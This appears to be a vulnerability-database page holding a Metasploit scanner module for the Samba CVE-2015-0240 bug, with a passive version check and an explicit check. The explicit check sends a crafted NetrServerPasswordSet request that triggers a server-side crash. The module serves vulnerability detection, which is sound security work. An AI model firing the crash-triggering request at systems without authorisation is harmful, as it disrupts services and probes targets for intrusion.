| Reporter | Title | Published | Views | Family All 165 |
|---|---|---|---|---|
| Samba < 3.6.2 x86 - PoC | 15 Apr 201500:00 | – | zdt | |
| Security fix for the ALT Linux 10 package samba version 4.1.17-alt1 | 23 Feb 201500:00 | – | altlinux | |
| Security fix for the ALT Linux 8 package samba-DC version 4.1.17-alt1 | 23 Feb 201500:00 | – | altlinux | |
| Security fix for the ALT Linux 6 package samba version 3.5.22-alt0.M60P.1 | 24 Feb 201500:00 | – | altlinux | |
| Security fix for the ALT Linux 8 package samba version 4.1.17-alt1 | 23 Feb 201500:00 | – | altlinux | |
| Samba 3.5.x / 3.6.x < 3.6.25 / 4.0.x < 4.0.25 / 4.1.x < 4.1.17 / 4.2.x < 4.2rc5 TALLOC_FREE() RCE | 8 May 201500:00 | – | nessus | |
| CentOS 5 : samba3x (CESA-2015:0249) | 24 Feb 201500:00 | – | nessus | |
| CentOS 6 : samba4 (CESA-2015:0250) | 24 Feb 201500:00 | – | nessus | |
| CentOS 6 : samba (CESA-2015:0251) | 24 Feb 201500:00 | – | nessus | |
| CentOS 7 : samba (CESA-2015:0252) | 24 Feb 201500:00 | – | nessus |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary scanner for CVE-2015-0240: Samba _netr_ServerPasswordSet with an
# uninitialized credential state (see 'References' below). Two check modes are
# offered, selected by the PASSIVE option (see #check_host):
#   * passive  - compare the version in the SMB banner against the affected
#                ranges (#maybe_vulnerable?); cheap, but only a version heuristic.
#   * explicit - send a NetrServerPasswordSet request and treat a connection
#                that stops answering ("execution expired") as the vulnerable
#                signal (#is_vulnerable?); more definitive, but slow.
class MetasploitModule < Msf::Auxiliary
  # Exploit mixins should be called first
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT = Rex::Proto::SMB::Exceptions
  CONST = Rex::Proto::SMB::Constants

  # Interface UUID handed to dcerpc_handle in #is_vulnerable? (NETLOGON pipe).
  RPC_NETLOGON_UUID = '12345678-1234-abcd-ef00-01234567cffb'

  # Module metadata and options.
  #
  # SMBUser/SMBPass/SMBDomain default to empty strings and SMBDirect to true,
  # so the explicit check runs with whatever session smb_login establishes from
  # empty credentials. RPORT is deregistered because #check_host drives the
  # port itself through @smb_port (see #rport).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Samba _netr_ServerPasswordSet Uninitialized Credential State',
      'Description' => %q{
This module checks if a Samba target is vulnerable to an uninitialized variable creds vulnerability.
},
      'Author' =>
        [
          'Richard van Eeden', # Original discovery
          'sleepya', # Public PoC for the explicit check
          'sinn3r'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2015-0240'],
          ['OSVDB', '118637'],
          ['URL', 'https://www.redhat.com/en/blog/samba-vulnerability-cve-2015-0240'],
          ['URL', 'https://gist.github.com/worawit/33cc5534cb555a0b710b'],
          ['URL', 'https://www.nccgroup.com/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/']
        ],
      'DefaultOptions' =>
        {
          'SMBDirect' => true,
          'SMBPass' => '',
          'SMBUser' => '',
          'SMBDomain' => '',
          'DCERPC::fake_bind_multi' => false
        }
    ))

    # This is a good example of passive vs explicit check
    register_options([
      OptBool.new('PASSIVE', [false, 'Try banner checking instead of triggering the bug', false])
    ])

    # It's either 139 or 445. The user should not touch this.
    deregister_options('RPORT')
  end

  # Port for the current connection: the one #check_host is probing right now
  # (@smb_port), falling back to the datastore value when it has not been set.
  #
  # @return [Integer, nil]
  def rport
    @smb_port || datastore['RPORT']
  end

  # This method is more explicit, but a major downside is it's very slow.
  # So we leave the passive one as an option.
  # Please also see #maybe_vulnerable?
  #
  # Explicit check, in three stages:
  #   1. connect, smb_login and bind to the NETLOGON pipe. Any failure here is
  #      logged and reported as not vulnerable (false) - including a timeout,
  #      which at this stage says nothing about the bug.
  #   2. build the NetrServerPasswordSet stub (documented field by field below).
  #   3. dcerpc.call(0x06, stub). A normal reply, a fault (ErrorCode) or one of
  #      the listed transport errors means the server handled the request, so
  #      the method falls through to false. An "execution expired" timeout is
  #      taken as the server having stopped answering after hitting the faulty
  #      code path, so true. Any other exception is re-raised.
  # The SMB connection is always closed by the ensure clause.
  #
  # NOTE(review): both `rescue ::Exception` clauses also intercept
  # Interrupt/SystemExit; the first one swallows them and returns false.
  #
  # @param ip [String] target address; also used as the computer name in the stub
  # @return [Boolean] true when the explicit check indicates the target is affected
  def is_vulnerable?(ip)
    begin
      connect
      smb_login
      handle = dcerpc_handle(RPC_NETLOGON_UUID, '1.0','ncacn_np', ["\\netlogon"])
      dcerpc_bind(handle)
    rescue ::Rex::Proto::SMB::Exceptions::LoginError,
           ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      elog(e)
      return false
    rescue Errno::ECONNRESET,
           ::Rex::Proto::SMB::Exceptions::InvalidType,
           ::Rex::Proto::SMB::Exceptions::ReadPacket,
           ::Rex::Proto::SMB::Exceptions::InvalidCommand,
           ::Rex::Proto::SMB::Exceptions::InvalidWordCount,
           ::Rex::Proto::SMB::Exceptions::NoReply => e
      elog(e)
      return false
    rescue ::Exception => e
      elog(e)
      return false
    end

    # NetrServerPasswordSet request packet
    # Fixed header: four 32-bit, two 16-bit, three 32-bit little-endian fields
    # (pack format 'VVVVvvVVV'), followed by the variable-length computer name
    # and the credential/timestamp block.
    stub =
      [
        0x00, # Server handle
        0x01, # Max count
        0x00, # Offset
        0x01, # Actual count
        0x00, # Account name
        0x02, # Sec Chan Type
        0x0e, # Max count
        0x00, # Offset
        0x0e # Actual count
      ].pack('VVVVvvVVV')
    stub << Rex::Text::to_unicode(ip) # Computer name
    stub << [0x00].pack('v') # Null byte terminator for the computer name
    stub << '12345678' # Credential
    stub << [0x0a].pack('V') # Timestamp
    stub << "\x00" * 16 # Padding

    begin
      # Opnum 0x06 on the bound NETLOGON interface
      dcerpc.call(0x06, stub)
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      elog(e)
    rescue Errno::ECONNRESET,
           ::Rex::Proto::SMB::Exceptions::InvalidType,
           ::Rex::Proto::SMB::Exceptions::ReadPacket,
           ::Rex::Proto::SMB::Exceptions::InvalidCommand,
           ::Rex::Proto::SMB::Exceptions::InvalidWordCount,
           ::Rex::Proto::SMB::Exceptions::NoReply => e
      elog(e)
    rescue ::Exception => e
      if e.to_s =~ /execution expired/i
        # So what happens here is that when you trigger the buggy code path, you hit this:
        # Program received signal SIGSEGV, Segmentation fault.
        # 0xb732ab3b in talloc_chunk_from_ptr (ptr=0xc) at ../lib/talloc/talloc.c:370
        # 370 if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) {
        # In the Samba log, you'll see this as an "internal error" and there will be a "panic action".
        # And then Samba will basically not talk back to you at that point. In that case,
        # you will either lose the connection, or timeout, or whatever... depending on the SMB
        # API you're using. In our case (Metasploit), it's "execution expired."
        # Samba (daemon) will stay alive, so it's all good.
        return true
      else
        raise e
      end
    end

    # Reached when the call completed or failed with a handled error: not vulnerable.
    false
  ensure
    disconnect
  end

  # Returns the Samba version
  #
  # Fingerprints the server over SMB and returns its native LAN Manager string
  # (the "Samba x.y.z" banner that #maybe_vulnerable? parses). Login/protocol
  # errors and an "execution expired" timeout yield an empty string; any other
  # exception is re-raised. The connection is always disconnected.
  #
  # NOTE(review): relies on smb_fingerprint returning something indexable by
  # 'native_lm' (a Hash) - confirm against the mixin. The timeout match here is
  # case-sensitive, unlike the /i match in #is_vulnerable?.
  #
  # @return [String] native_lm banner, or '' when fingerprinting failed
  def get_samba_info
    res = ''
    begin
      res = smb_fingerprint
    rescue ::Rex::Proto::SMB::Exceptions::LoginError,
           ::Rex::Proto::SMB::Exceptions::ErrorCode
      return res
    rescue Errno::ECONNRESET,
           ::Rex::Proto::SMB::Exceptions::InvalidType,
           ::Rex::Proto::SMB::Exceptions::ReadPacket,
           ::Rex::Proto::SMB::Exceptions::InvalidCommand,
           ::Rex::Proto::SMB::Exceptions::InvalidWordCount,
           ::Rex::Proto::SMB::Exceptions::NoReply
      return res
    rescue ::Exception => e
      if e.to_s =~ /execution expired/
        return res
      else
        raise e
      end
    ensure
      disconnect
    end

    res['native_lm'].to_s
  end

  # Converts a version string into an object so we can eval it
  #
  # @param v [String] dotted version such as '3.6.25'
  # @return [Rex::Version] comparable version object
  def version(v)
    Rex::Version.new(v)
  end

  # Passive check for the uninitialized bug. The information is based on http://cve.mitre.org/
  #
  # Extracts the first "Samba x.y.z" from the banner and compares it against the
  # affected ranges below; returns false when no version can be parsed.
  #
  # NOTE(review): the 3.5 branch is bounded inclusively at 3.5.9, while the other
  # branches stop just below the fixing release (3.6.25, 4.0.25, 4.1.17). Other
  # trackers of this CVE describe the affected series as "3.5.x" with no upper
  # bound, so 3.5.10 and later 3.5 builds currently evaluate to false - confirm
  # whether that is intended.
  #
  # @param samba_version [String] banner text as returned by #get_samba_info
  # @return [Boolean] true when the banner version falls in an affected range
  def maybe_vulnerable?(samba_version)
    v = samba_version.scan(/Samba (\d+\.\d+\.\d+)/).flatten[0] || ''
    return false if v.empty?
    found_version = version(v)
    if found_version >= version('3.5.0') && found_version <= version('3.5.9')
      return true
    elsif found_version >= version('3.6.0') && found_version < version('3.6.25')
      return true
    elsif found_version >= version('4.0.0') && found_version < version('4.0.25')
      return true
    elsif found_version >= version('4.1.0') && found_version < version('4.1.17')
      return true
    end

    false
  end

  # Check command
  #
  # Tries 445 then 139, setting @smb_port so that #rport follows. For each port
  # the banner is fetched; if it does not start with "samba" - which includes
  # the empty string #get_samba_info returns on failure - the method returns
  # Safe immediately, so 139 is only reached when 445 answered as Samba but was
  # not flagged. Otherwise the passive or the explicit check runs and a positive
  # result is recorded via #flag_vuln_host before returning.
  #
  # NOTE(review): because a non-Samba (or empty) banner on either port returns
  # Safe, Detected is only reached when both ports report Samba; a host that
  # speaks Samba on 445 alone ends up as Safe after the 139 attempt.
  #
  # @param ip [String] target address
  # @return [Exploit::CheckCode] Vulnerable (explicit hit), Appears (passive hit),
  #   Detected (Samba seen on both ports, not flagged) or Safe
  def check_host(ip)
    samba_info = ''
    smb_ports = [445, 139]

    smb_ports.each do |port|
      @smb_port = port
      samba_info = get_samba_info
      vprint_status("Samba version: #{samba_info}")

      if samba_info !~ /^samba/i
        vprint_status("Target isn't Samba, no check will run.")
        return Exploit::CheckCode::Safe
      end

      if datastore['PASSIVE']
        if maybe_vulnerable?(samba_info)
          flag_vuln_host(ip, samba_info)
          return Exploit::CheckCode::Appears
        end
      else
        # Explicit: Actually triggers the bug
        if is_vulnerable?(ip)
          flag_vuln_host(ip, samba_info)
          return Exploit::CheckCode::Vulnerable
        end
      end
    end

    return Exploit::CheckCode::Detected if samba_info =~ /^samba/i

    Exploit::CheckCode::Safe
  end

  # Reports to the database about a possible vulnerable host
  #
  # @param ip [String] target address
  # @param samba_version [String] banner stored in the vuln record's :info field
  def flag_vuln_host(ip, samba_version)
    report_vuln(
      :host => ip,
      :port => rport,
      :proto => 'tcp',
      :name => self.name,
      :info => samba_version,
      :refs => self.references
    )
  end

  # Scanner entry point: runs #check_host and prints one line per outcome.
  #
  # NOTE(review): `peer` is assigned but never used.
  #
  # @param ip [String] target address supplied by the scanner mixin
  def run_host(ip)
    peer = "#{ip}:#{rport}"
    case check_host(ip)
    when Exploit::CheckCode::Vulnerable
      print_good("The target is vulnerable to CVE-2015-0240.")
    when Exploit::CheckCode::Appears
      print_good("The target appears to be vulnerable to CVE-2015-0240.")
    when Exploit::CheckCode::Detected
      print_status("The target appears to be running Samba.")
    else
      print_status("The target appears to be safe")
    end
  end
end